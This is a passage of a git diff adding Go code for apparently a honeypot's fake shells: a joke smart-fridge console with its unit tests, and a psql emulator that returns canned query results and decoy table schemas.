parts := strings.Fields(input)
|
||||||
|
if len(parts) == 0 {
|
||||||
|
return commandResult{}
|
||||||
|
}
|
||||||
|
|
||||||
|
cmd := strings.ToLower(parts[0])
|
||||||
|
args := parts[1:]
|
||||||
|
|
||||||
|
switch cmd {
|
||||||
|
case "help":
|
||||||
|
return s.cmdHelp()
|
||||||
|
case "inventory":
|
||||||
|
return s.cmdInventory(args)
|
||||||
|
case "temp", "temperature":
|
||||||
|
return s.cmdTemp(args)
|
||||||
|
case "status":
|
||||||
|
return s.cmdStatus()
|
||||||
|
case "diagnostics":
|
||||||
|
return s.cmdDiagnostics()
|
||||||
|
case "alerts":
|
||||||
|
return s.cmdAlerts()
|
||||||
|
case "reboot":
|
||||||
|
return s.cmdReboot()
|
||||||
|
case "exit", "logout":
|
||||||
|
return commandResult{output: "Goodbye! Keep your food fresh!", exit: true}
|
||||||
|
default:
|
||||||
|
return commandResult{output: fmt.Sprintf("FridgeOS: unknown command '%s'. Type 'help' for available commands.", cmd)}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *fridgeState) cmdHelp() commandResult {
|
||||||
|
help := `Available commands:
|
||||||
|
help - Show this help message
|
||||||
|
inventory - List fridge contents
|
||||||
|
inventory add <item> - Add item to inventory
|
||||||
|
inventory remove <item> - Remove item from inventory
|
||||||
|
temp - Show current temperatures
|
||||||
|
temp set <zone> <value> - Set temperature (zone: fridge|freezer)
|
||||||
|
status - Show system status
|
||||||
|
diagnostics - Run system diagnostics
|
||||||
|
alerts - Show active alerts
|
||||||
|
reboot - Reboot FridgeOS
|
||||||
|
exit / logout - Disconnect`
|
||||||
|
return commandResult{output: help}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *fridgeState) cmdInventory(args []string) commandResult {
|
||||||
|
if len(args) == 0 || strings.ToLower(args[0]) == "list" {
|
||||||
|
return s.inventoryList()
|
||||||
|
}
|
||||||
|
|
||||||
|
sub := strings.ToLower(args[0])
|
||||||
|
switch sub {
|
||||||
|
case "add":
|
||||||
|
if len(args) < 2 {
|
||||||
|
return commandResult{output: "Usage: inventory add <item>"}
|
||||||
|
}
|
||||||
|
item := strings.Join(args[1:], " ")
|
||||||
|
return s.inventoryAdd(item)
|
||||||
|
case "remove":
|
||||||
|
if len(args) < 2 {
|
||||||
|
return commandResult{output: "Usage: inventory remove <item>"}
|
||||||
|
}
|
||||||
|
item := strings.Join(args[1:], " ")
|
||||||
|
return s.inventoryRemove(item)
|
||||||
|
default:
|
||||||
|
return commandResult{output: fmt.Sprintf("Unknown inventory subcommand '%s'. Try: list, add, remove", sub)}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *fridgeState) inventoryList() commandResult {
|
||||||
|
if len(s.inventory) == 0 {
|
||||||
|
return commandResult{output: "Inventory is empty."}
|
||||||
|
}
|
||||||
|
var b strings.Builder
|
||||||
|
b.WriteString("=== Fridge Inventory ===\n")
|
||||||
|
b.WriteString(fmt.Sprintf("%-30s %s\n", "ITEM", "EXPIRES"))
|
||||||
|
b.WriteString(fmt.Sprintf("%-30s %s\n", "----", "-------"))
|
||||||
|
for _, item := range s.inventory {
|
||||||
|
b.WriteString(fmt.Sprintf("%-30s %s\n", item.name, item.expiry))
|
||||||
|
}
|
||||||
|
b.WriteString(fmt.Sprintf("\nTotal items: %d", len(s.inventory)))
|
||||||
|
return commandResult{output: b.String()}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *fridgeState) inventoryAdd(item string) commandResult {
|
||||||
|
expiry := time.Now().Add(7 * 24 * time.Hour).Format("2006-01-02")
|
||||||
|
s.inventory = append(s.inventory, inventoryItem{name: item, expiry: expiry})
|
||||||
|
return commandResult{output: fmt.Sprintf("Added '%s' to inventory (expires: %s).", item, expiry)}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *fridgeState) inventoryRemove(item string) commandResult {
|
||||||
|
lower := strings.ToLower(item)
|
||||||
|
for i, inv := range s.inventory {
|
||||||
|
if strings.ToLower(inv.name) == lower || strings.Contains(strings.ToLower(inv.name), lower) {
|
||||||
|
s.inventory = append(s.inventory[:i], s.inventory[i+1:]...)
|
||||||
|
return commandResult{output: fmt.Sprintf("Removed '%s' from inventory.", inv.name)}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return commandResult{output: fmt.Sprintf("Item '%s' not found in inventory.", item)}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *fridgeState) cmdTemp(args []string) commandResult {
|
||||||
|
if len(args) == 0 {
|
||||||
|
return commandResult{output: fmt.Sprintf(
|
||||||
|
"=== Temperature Status ===\nFridge: %d°F (%.1f°C)\nFreezer: %d°F (%.1f°C)",
|
||||||
|
s.fridgeF, fToC(s.fridgeF), s.freezerF, fToC(s.freezerF),
|
||||||
|
)}
|
||||||
|
}
|
||||||
|
|
||||||
|
if strings.ToLower(args[0]) != "set" || len(args) < 3 {
|
||||||
|
return commandResult{output: "Usage: temp set <fridge|freezer> <value_in_F>"}
|
||||||
|
}
|
||||||
|
|
||||||
|
zone := strings.ToLower(args[1])
|
||||||
|
var val int
|
||||||
|
if _, err := fmt.Sscanf(args[2], "%d", &val); err != nil {
|
||||||
|
return commandResult{output: "Invalid temperature value. Must be an integer."}
|
||||||
|
}
|
||||||
|
|
||||||
|
switch zone {
|
||||||
|
case "fridge":
|
||||||
|
if val < 33 || val > 45 {
|
||||||
|
return commandResult{output: fmt.Sprintf("WARNING: Temperature %d°F is out of safe range (33-45°F). Setting rejected.", val)}
|
||||||
|
}
|
||||||
|
s.fridgeF = val
|
||||||
|
return commandResult{output: fmt.Sprintf("Fridge temperature set to %d°F (%.1f°C).", val, fToC(val))}
|
||||||
|
case "freezer":
|
||||||
|
if val < -10 || val > 10 {
|
||||||
|
return commandResult{output: fmt.Sprintf("WARNING: Temperature %d°F is out of safe range (-10 to 10°F). Setting rejected.", val)}
|
||||||
|
}
|
||||||
|
s.freezerF = val
|
||||||
|
return commandResult{output: fmt.Sprintf("Freezer temperature set to %d°F (%.1f°C).", val, fToC(val))}
|
||||||
|
default:
|
||||||
|
return commandResult{output: fmt.Sprintf("Unknown zone '%s'. Use 'fridge' or 'freezer'.", zone)}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func fToC(f int) float64 {
|
||||||
|
return float64(f-32) * 5.0 / 9.0
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *fridgeState) cmdStatus() commandResult {
|
||||||
|
status := `=== FridgeOS System Status ===
|
||||||
|
Compressor: Running
|
||||||
|
Door seal: OK
|
||||||
|
Ice maker: Active
|
||||||
|
Water filter: 82% remaining
|
||||||
|
|
||||||
|
WiFi: Connected (SmartHome-5G)
|
||||||
|
Signal: -42 dBm
|
||||||
|
Internal camera: Online (3 objects detected)
|
||||||
|
Voice assistant: Standby
|
||||||
|
TikTok recipes: Enabled
|
||||||
|
Spotify: "Chill Vibes" playlist paused
|
||||||
|
|
||||||
|
Energy rating: A++
|
||||||
|
Power: 127W
|
||||||
|
SmartHome Hub: Connected (12 devices)
|
||||||
|
|
||||||
|
Firmware: v3.2.1-stable
|
||||||
|
Update available: v3.3.0-beta`
|
||||||
|
return commandResult{output: status}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *fridgeState) cmdDiagnostics() commandResult {
|
||||||
|
diag := `Running FridgeOS diagnostics...
|
||||||
|
|
||||||
|
[1/6] Compressor.............. OK
|
||||||
|
[2/6] Temperature sensors..... OK
|
||||||
|
[3/6] Door seal integrity..... OK
|
||||||
|
[4/6] Ice maker............... OK
|
||||||
|
[5/6] Network connectivity.... OK
|
||||||
|
[6/6] Internal camera......... OK
|
||||||
|
|
||||||
|
ALL SYSTEMS NOMINAL`
|
||||||
|
return commandResult{output: diag}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *fridgeState) cmdAlerts() commandResult {
|
||||||
|
// Build dynamic alerts based on inventory.
|
||||||
|
var alerts []string
|
||||||
|
for _, item := range s.inventory {
|
||||||
|
expiry, err := time.Parse("2006-01-02", item.expiry)
|
||||||
|
if err != nil {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
days := int(time.Until(expiry).Hours() / 24)
|
||||||
|
if days < 0 {
|
||||||
|
alerts = append(alerts, fmt.Sprintf("CRITICAL: %s expired %d day(s) ago!", item.name, -days))
|
||||||
|
} else if days <= 2 {
|
||||||
|
alerts = append(alerts, fmt.Sprintf("WARNING: %s expires in %d day(s)", item.name, days))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
alerts = append(alerts,
|
||||||
|
"INFO: Ice maker: low water pressure detected",
|
||||||
|
"INFO: Firmware update available: v3.3.0-beta",
|
||||||
|
"INFO: TikTok recipe sync overdue (last sync: 3 days ago)",
|
||||||
|
)
|
||||||
|
|
||||||
|
var b strings.Builder
|
||||||
|
b.WriteString("=== Active Alerts ===\n")
|
||||||
|
for _, a := range alerts {
|
||||||
|
b.WriteString(a + "\n")
|
||||||
|
}
|
||||||
|
b.WriteString(fmt.Sprintf("\n%d alert(s) active", len(alerts)))
|
||||||
|
return commandResult{output: b.String()}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *fridgeState) cmdReboot() commandResult {
|
||||||
|
reboot := `FridgeOS is rebooting...
|
||||||
|
|
||||||
|
Stopping services........... done
|
||||||
|
Saving inventory data....... done
|
||||||
|
Flushing temperature log.... done
|
||||||
|
Unmounting partitions....... done
|
||||||
|
|
||||||
|
Rebooting now. Goodbye!`
|
||||||
|
return commandResult{output: reboot, exit: true}
|
||||||
|
}
|
||||||
233
internal/shell/fridge/fridge_test.go
Normal file
233
internal/shell/fridge/fridge_test.go
Normal file
@@ -0,0 +1,233 @@
|
|||||||
|
package fridge
|
||||||
|
|
||||||
|
import (
|
||||||
|
"bytes"
|
||||||
|
"context"
|
||||||
|
"io"
|
||||||
|
"strings"
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/shell"
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/storage"
|
||||||
|
)
|
||||||
|
|
||||||
|
type rwCloser struct {
|
||||||
|
io.Reader
|
||||||
|
io.Writer
|
||||||
|
}
|
||||||
|
|
||||||
|
func (r *rwCloser) Close() error { return nil }
|
||||||
|
|
||||||
|
func runShell(t *testing.T, commands string) string {
|
||||||
|
t.Helper()
|
||||||
|
store := storage.NewMemoryStore()
|
||||||
|
sessID, _ := store.CreateSession(context.Background(), "127.0.0.1", "root", "fridge", "")
|
||||||
|
|
||||||
|
sess := &shell.SessionContext{
|
||||||
|
SessionID: sessID,
|
||||||
|
Username: "root",
|
||||||
|
Store: store,
|
||||||
|
CommonConfig: shell.ShellCommonConfig{
|
||||||
|
Hostname: "testhost",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
rw := &rwCloser{
|
||||||
|
Reader: bytes.NewBufferString(commands),
|
||||||
|
Writer: &bytes.Buffer{},
|
||||||
|
}
|
||||||
|
|
||||||
|
sh := NewFridgeShell()
|
||||||
|
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
if err := sh.Handle(ctx, sess, rw); err != nil {
|
||||||
|
t.Fatalf("Handle: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
return rw.Writer.(*bytes.Buffer).String()
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestFridgeShellName(t *testing.T) {
|
||||||
|
sh := NewFridgeShell()
|
||||||
|
if sh.Name() != "fridge" {
|
||||||
|
t.Errorf("Name() = %q, want %q", sh.Name(), "fridge")
|
||||||
|
}
|
||||||
|
if sh.Description() == "" {
|
||||||
|
t.Error("Description() should not be empty")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestBootBanner(t *testing.T) {
|
||||||
|
output := runShell(t, "exit\r")
|
||||||
|
if !strings.Contains(output, "FridgeOS-ARM") {
|
||||||
|
t.Error("output should contain FridgeOS-ARM in banner")
|
||||||
|
}
|
||||||
|
if !strings.Contains(output, "Samsung Smart Fridge OS") {
|
||||||
|
t.Error("output should contain Samsung Smart Fridge OS")
|
||||||
|
}
|
||||||
|
if !strings.Contains(output, "FridgeOS>") {
|
||||||
|
t.Error("output should contain FridgeOS> prompt")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestHelpCommand(t *testing.T) {
|
||||||
|
output := runShell(t, "help\rexit\r")
|
||||||
|
for _, keyword := range []string{"inventory", "temp", "status", "diagnostics", "alerts", "reboot", "exit"} {
|
||||||
|
if !strings.Contains(output, keyword) {
|
||||||
|
t.Errorf("help output should mention %q", keyword)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestInventoryList(t *testing.T) {
|
||||||
|
output := runShell(t, "inventory\rexit\r")
|
||||||
|
if !strings.Contains(output, "Fridge Inventory") {
|
||||||
|
t.Error("should show inventory header")
|
||||||
|
}
|
||||||
|
if !strings.Contains(output, "Whole Milk") {
|
||||||
|
t.Error("should list milk")
|
||||||
|
}
|
||||||
|
if !strings.Contains(output, "Eggs") {
|
||||||
|
t.Error("should list eggs")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestInventoryAdd(t *testing.T) {
|
||||||
|
output := runShell(t, "inventory add Cheese\rinventory\rexit\r")
|
||||||
|
if !strings.Contains(output, "Added 'Cheese'") {
|
||||||
|
t.Error("should confirm adding cheese")
|
||||||
|
}
|
||||||
|
if !strings.Contains(output, "Cheese") {
|
||||||
|
t.Error("inventory list should contain cheese")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestInventoryRemove(t *testing.T) {
|
||||||
|
output := runShell(t, "inventory remove milk\rinventory\rexit\r")
|
||||||
|
if !strings.Contains(output, "Removed") {
|
||||||
|
t.Error("should confirm removal")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestTemperature(t *testing.T) {
|
||||||
|
output := runShell(t, "temp\rexit\r")
|
||||||
|
if !strings.Contains(output, "37") {
|
||||||
|
t.Error("should show fridge temp 37°F")
|
||||||
|
}
|
||||||
|
if !strings.Contains(output, "Fridge") {
|
||||||
|
t.Error("should label fridge zone")
|
||||||
|
}
|
||||||
|
if !strings.Contains(output, "Freezer") {
|
||||||
|
t.Error("should label freezer zone")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestTempSetValid(t *testing.T) {
|
||||||
|
output := runShell(t, "temp set fridge 40\rtemp\rexit\r")
|
||||||
|
if !strings.Contains(output, "set to 40") {
|
||||||
|
t.Errorf("should confirm temp set, got: %s", output)
|
||||||
|
}
|
||||||
|
// Second temp call should show 40.
|
||||||
|
if !strings.Contains(output, "40") {
|
||||||
|
t.Error("temperature should now be 40")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestTempSetOutOfRange(t *testing.T) {
|
||||||
|
output := runShell(t, "temp set fridge 100\rexit\r")
|
||||||
|
if !strings.Contains(output, "WARNING") {
|
||||||
|
t.Error("should warn about out-of-range temp")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestTempSetFreezerOutOfRange(t *testing.T) {
|
||||||
|
output := runShell(t, "temp set freezer 50\rexit\r")
|
||||||
|
if !strings.Contains(output, "WARNING") {
|
||||||
|
t.Error("should warn about out-of-range freezer temp")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestStatus(t *testing.T) {
|
||||||
|
output := runShell(t, "status\rexit\r")
|
||||||
|
for _, keyword := range []string{"Compressor", "WiFi", "Ice maker", "TikTok", "Spotify", "SmartHome"} {
|
||||||
|
if !strings.Contains(output, keyword) {
|
||||||
|
t.Errorf("status should contain %q", keyword)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestDiagnostics(t *testing.T) {
|
||||||
|
output := runShell(t, "diagnostics\rexit\r")
|
||||||
|
if !strings.Contains(output, "ALL SYSTEMS NOMINAL") {
|
||||||
|
t.Error("diagnostics should end with ALL SYSTEMS NOMINAL")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestAlerts(t *testing.T) {
|
||||||
|
output := runShell(t, "alerts\rexit\r")
|
||||||
|
if !strings.Contains(output, "Active Alerts") {
|
||||||
|
t.Error("should show alerts header")
|
||||||
|
}
|
||||||
|
if !strings.Contains(output, "Firmware update") {
|
||||||
|
t.Error("should mention firmware update")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestReboot(t *testing.T) {
|
||||||
|
output := runShell(t, "reboot\r")
|
||||||
|
if !strings.Contains(output, "rebooting") || !strings.Contains(output, "Rebooting") {
|
||||||
|
t.Error("should show reboot message")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestUnknownCommand(t *testing.T) {
|
||||||
|
output := runShell(t, "foobar\rexit\r")
|
||||||
|
if !strings.Contains(output, "unknown command") {
|
||||||
|
t.Error("should show unknown command message")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestExitCommand(t *testing.T) {
|
||||||
|
output := runShell(t, "exit\r")
|
||||||
|
if !strings.Contains(output, "Goodbye") {
|
||||||
|
t.Error("exit should show goodbye message")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestLogoutCommand(t *testing.T) {
|
||||||
|
output := runShell(t, "logout\r")
|
||||||
|
if !strings.Contains(output, "Goodbye") {
|
||||||
|
t.Error("logout should show goodbye message")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSessionLogs(t *testing.T) {
|
||||||
|
store := storage.NewMemoryStore()
|
||||||
|
sessID, _ := store.CreateSession(context.Background(), "127.0.0.1", "root", "fridge", "")
|
||||||
|
|
||||||
|
sess := &shell.SessionContext{
|
||||||
|
SessionID: sessID,
|
||||||
|
Username: "root",
|
||||||
|
Store: store,
|
||||||
|
CommonConfig: shell.ShellCommonConfig{
|
||||||
|
Hostname: "testhost",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
rw := &rwCloser{
|
||||||
|
Reader: bytes.NewBufferString("help\rexit\r"),
|
||||||
|
Writer: &bytes.Buffer{},
|
||||||
|
}
|
||||||
|
|
||||||
|
sh := NewFridgeShell()
|
||||||
|
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
sh.Handle(ctx, sess, rw)
|
||||||
|
|
||||||
|
if len(store.SessionLogs) < 2 {
|
||||||
|
t.Errorf("expected at least 2 session logs, got %d", len(store.SessionLogs))
|
||||||
|
}
|
||||||
|
}
|
||||||
123
internal/shell/psql/commands.go
Normal file
123
internal/shell/psql/commands.go
Normal file
@@ -0,0 +1,123 @@
|
|||||||
|
package psql
|
||||||
|
|
||||||
|
import (
|
||||||
|
"fmt"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
// commandResult holds the output of a command and whether the session should end.
|
||||||
|
type commandResult struct {
|
||||||
|
output string
|
||||||
|
exit bool
|
||||||
|
}
|
||||||
|
|
||||||
|
// dispatchBackslash handles psql backslash meta-commands.
|
||||||
|
func dispatchBackslash(cmd, dbName string) commandResult {
|
||||||
|
// Normalize: trim spaces after the backslash command word.
|
||||||
|
parts := strings.Fields(cmd)
|
||||||
|
if len(parts) == 0 {
|
||||||
|
return commandResult{output: "Invalid command \\. Try \\? for help."}
|
||||||
|
}
|
||||||
|
|
||||||
|
verb := parts[0] // e.g. `\q`, `\dt`, `\d`
|
||||||
|
args := parts[1:]
|
||||||
|
|
||||||
|
switch verb {
|
||||||
|
case `\q`:
|
||||||
|
return commandResult{exit: true}
|
||||||
|
case `\dt`:
|
||||||
|
return commandResult{output: listTables()}
|
||||||
|
case `\d`:
|
||||||
|
if len(args) == 0 {
|
||||||
|
return commandResult{output: listTables()}
|
||||||
|
}
|
||||||
|
return commandResult{output: describeTable(args[0])}
|
||||||
|
case `\l`:
|
||||||
|
return commandResult{output: listDatabases()}
|
||||||
|
case `\du`:
|
||||||
|
return commandResult{output: listRoles()}
|
||||||
|
case `\conninfo`:
|
||||||
|
return commandResult{output: connInfo(dbName)}
|
||||||
|
case `\?`:
|
||||||
|
return commandResult{output: backslashHelp()}
|
||||||
|
case `\h`:
|
||||||
|
return commandResult{output: sqlHelp()}
|
||||||
|
default:
|
||||||
|
return commandResult{output: fmt.Sprintf("Invalid command %s. Try \\? for help.", verb)}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// dispatchSQL handles SQL statements (already accumulated and semicolon-terminated).
|
||||||
|
func dispatchSQL(sql, dbName, pgVersion string) commandResult {
|
||||||
|
// Strip trailing semicolon and whitespace for matching.
|
||||||
|
trimmed := strings.TrimRight(sql, "; \t")
|
||||||
|
trimmed = strings.TrimSpace(trimmed)
|
||||||
|
upper := strings.ToUpper(trimmed)
|
||||||
|
|
||||||
|
switch {
|
||||||
|
case upper == "SELECT VERSION()":
|
||||||
|
ver := fmt.Sprintf("PostgreSQL %s on x86_64-pc-linux-gnu, compiled by gcc (GCC) 13.2.0, 64-bit", pgVersion)
|
||||||
|
return commandResult{output: formatSingleValue("version", ver)}
|
||||||
|
case upper == "SELECT CURRENT_DATABASE()":
|
||||||
|
return commandResult{output: formatSingleValue("current_database", dbName)}
|
||||||
|
case upper == "SELECT CURRENT_USER":
|
||||||
|
return commandResult{output: formatSingleValue("current_user", "postgres")}
|
||||||
|
case upper == "SELECT NOW()":
|
||||||
|
now := time.Now().UTC().Format("2006-01-02 15:04:05.000000+00")
|
||||||
|
return commandResult{output: formatSingleValue("now", now)}
|
||||||
|
case upper == "SELECT 1":
|
||||||
|
return commandResult{output: formatSingleValue("?column?", "1")}
|
||||||
|
case strings.HasPrefix(upper, "INSERT"):
|
||||||
|
return commandResult{output: "INSERT 0 1"}
|
||||||
|
case strings.HasPrefix(upper, "UPDATE"):
|
||||||
|
return commandResult{output: "UPDATE 1"}
|
||||||
|
case strings.HasPrefix(upper, "DELETE"):
|
||||||
|
return commandResult{output: "DELETE 1"}
|
||||||
|
case strings.HasPrefix(upper, "CREATE TABLE"):
|
||||||
|
return commandResult{output: "CREATE TABLE"}
|
||||||
|
case strings.HasPrefix(upper, "CREATE DATABASE"):
|
||||||
|
return commandResult{output: "CREATE DATABASE"}
|
||||||
|
case strings.HasPrefix(upper, "DROP TABLE"):
|
||||||
|
return commandResult{output: "DROP TABLE"}
|
||||||
|
case strings.HasPrefix(upper, "ALTER TABLE"):
|
||||||
|
return commandResult{output: "ALTER TABLE"}
|
||||||
|
case upper == "BEGIN":
|
||||||
|
return commandResult{output: "BEGIN"}
|
||||||
|
case upper == "COMMIT":
|
||||||
|
return commandResult{output: "COMMIT"}
|
||||||
|
case upper == "ROLLBACK":
|
||||||
|
return commandResult{output: "ROLLBACK"}
|
||||||
|
case upper == "SHOW SERVER_VERSION":
|
||||||
|
return commandResult{output: formatSingleValue("server_version", pgVersion)}
|
||||||
|
case upper == "SHOW SEARCH_PATH":
|
||||||
|
return commandResult{output: formatSingleValue("search_path", "\"$user\", public")}
|
||||||
|
case strings.HasPrefix(upper, "SET "):
|
||||||
|
return commandResult{output: "SET"}
|
||||||
|
default:
|
||||||
|
// Extract the first token for the error message.
|
||||||
|
firstToken := strings.Fields(trimmed)
|
||||||
|
token := trimmed
|
||||||
|
if len(firstToken) > 0 {
|
||||||
|
token = firstToken[0]
|
||||||
|
}
|
||||||
|
return commandResult{output: fmt.Sprintf("ERROR: syntax error at or near \"%s\"\nLINE 1: %s\n ^", token, trimmed)}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// formatSingleValue formats a single-row, single-column psql result.
|
||||||
|
func formatSingleValue(colName, value string) string {
|
||||||
|
width := max(len(colName), len(value))
|
||||||
|
|
||||||
|
var b strings.Builder
|
||||||
|
// Header
|
||||||
|
fmt.Fprintf(&b, " %-*s \n", width, colName)
|
||||||
|
// Separator
|
||||||
|
b.WriteString(strings.Repeat("-", width+2))
|
||||||
|
b.WriteString("\n")
|
||||||
|
// Value
|
||||||
|
fmt.Fprintf(&b, " %-*s\n", width, value)
|
||||||
|
// Row count
|
||||||
|
b.WriteString("(1 row)")
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
155
internal/shell/psql/output.go
Normal file
155
internal/shell/psql/output.go
Normal file
@@ -0,0 +1,155 @@
|
|||||||
|
package psql
|
||||||
|
|
||||||
|
import "fmt"
|
||||||
|
|
||||||
|
func startupBanner(version string) string {
|
||||||
|
return fmt.Sprintf("psql (%s)\nType \"help\" for help.\n", version)
|
||||||
|
}
|
||||||
|
|
||||||
|
func listTables() string {
|
||||||
|
return ` List of relations
|
||||||
|
Schema | Name | Type | Owner
|
||||||
|
--------+---------------+-------+----------
|
||||||
|
public | audit_log | table | postgres
|
||||||
|
public | credentials | table | postgres
|
||||||
|
public | sessions | table | postgres
|
||||||
|
public | users | table | postgres
|
||||||
|
(4 rows)`
|
||||||
|
}
|
||||||
|
|
||||||
|
func listDatabases() string {
|
||||||
|
return ` List of databases
|
||||||
|
Name | Owner | Encoding | Collate | Ctype | Access privileges
|
||||||
|
-----------+----------+----------+-------------+-------------+-----------------------
|
||||||
|
app_db | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
|
||||||
|
postgres | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
|
||||||
|
template0 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres +
|
||||||
|
| | | | | postgres=CTc/postgres
|
||||||
|
template1 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres +
|
||||||
|
| | | | | postgres=CTc/postgres
|
||||||
|
(4 rows)`
|
||||||
|
}
|
||||||
|
|
||||||
|
func listRoles() string {
|
||||||
|
return ` List of roles
|
||||||
|
Role name | Attributes | Member of
|
||||||
|
-----------+------------------------------------------------------------+-----------
|
||||||
|
app_user | | {}
|
||||||
|
postgres | Superuser, Create role, Create DB, Replication, Bypass RLS | {}
|
||||||
|
readonly | Cannot login | {}`
|
||||||
|
}
|
||||||
|
|
||||||
|
func describeTable(name string) string {
|
||||||
|
switch name {
|
||||||
|
case "users":
|
||||||
|
return ` Table "public.users"
|
||||||
|
Column | Type | Collation | Nullable | Default
|
||||||
|
------------+-----------------------------+-----------+----------+-----------------------------------
|
||||||
|
id | integer | | not null | nextval('users_id_seq'::regclass)
|
||||||
|
username | character varying(255) | | not null |
|
||||||
|
email | character varying(255) | | not null |
|
||||||
|
password | character varying(255) | | not null |
|
||||||
|
created_at | timestamp without time zone | | | now()
|
||||||
|
updated_at | timestamp without time zone | | | now()
|
||||||
|
Indexes:
|
||||||
|
"users_pkey" PRIMARY KEY, btree (id)
|
||||||
|
"users_email_key" UNIQUE, btree (email)
|
||||||
|
"users_username_key" UNIQUE, btree (username)`
|
||||||
|
case "sessions":
|
||||||
|
return ` Table "public.sessions"
|
||||||
|
Column | Type | Collation | Nullable | Default
|
||||||
|
------------+-----------------------------+-----------+----------+--------------------------------------
|
||||||
|
id | integer | | not null | nextval('sessions_id_seq'::regclass)
|
||||||
|
user_id | integer | | |
|
||||||
|
token | character varying(255) | | not null |
|
||||||
|
ip_address | inet | | |
|
||||||
|
created_at | timestamp without time zone | | | now()
|
||||||
|
expires_at | timestamp without time zone | | not null |
|
||||||
|
Indexes:
|
||||||
|
"sessions_pkey" PRIMARY KEY, btree (id)
|
||||||
|
"sessions_token_key" UNIQUE, btree (token)
|
||||||
|
Foreign-key constraints:
|
||||||
|
"sessions_user_id_fkey" FOREIGN KEY (user_id) REFERENCES users(id)`
|
||||||
|
case "credentials":
|
||||||
|
return ` Table "public.credentials"
|
||||||
|
Column | Type | Collation | Nullable | Default
|
||||||
|
-----------+-----------------------------+-----------+----------+-----------------------------------------
|
||||||
|
id | integer | | not null | nextval('credentials_id_seq'::regclass)
|
||||||
|
user_id | integer | | |
|
||||||
|
type | character varying(50) | | not null |
|
||||||
|
value | text | | not null |
|
||||||
|
created_at| timestamp without time zone | | | now()
|
||||||
|
Indexes:
|
||||||
|
"credentials_pkey" PRIMARY KEY, btree (id)
|
||||||
|
Foreign-key constraints:
|
||||||
|
"credentials_user_id_fkey" FOREIGN KEY (user_id) REFERENCES users(id)`
|
||||||
|
case "audit_log":
|
||||||
|
return ` Table "public.audit_log"
|
||||||
|
Column | Type | Collation | Nullable | Default
|
||||||
|
------------+-----------------------------+-----------+----------+---------------------------------------
|
||||||
|
id | integer | | not null | nextval('audit_log_id_seq'::regclass)
|
||||||
|
user_id | integer | | |
|
||||||
|
action | character varying(100) | | not null |
|
||||||
|
details | text | | |
|
||||||
|
ip_address | inet | | |
|
||||||
|
created_at | timestamp without time zone | | | now()
|
||||||
|
Indexes:
|
||||||
|
"audit_log_pkey" PRIMARY KEY, btree (id)
|
||||||
|
Foreign-key constraints:
|
||||||
|
"audit_log_user_id_fkey" FOREIGN KEY (user_id) REFERENCES users(id)`
|
||||||
|
default:
|
||||||
|
return fmt.Sprintf("Did not find any relation named \"%s\".", name)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func connInfo(dbName string) string {
|
||||||
|
return fmt.Sprintf("You are connected to database \"%s\" as user \"postgres\" via socket in \"/var/run/postgresql\" at port \"5432\".", dbName)
|
||||||
|
}
|
||||||
|
|
||||||
|
func backslashHelp() string {
|
||||||
|
return `General
|
||||||
|
\copyright show PostgreSQL usage and distribution terms
|
||||||
|
\crosstabview [COLUMNS] execute query and display result in crosstab
|
||||||
|
\errverbose show most recent error message at maximum verbosity
|
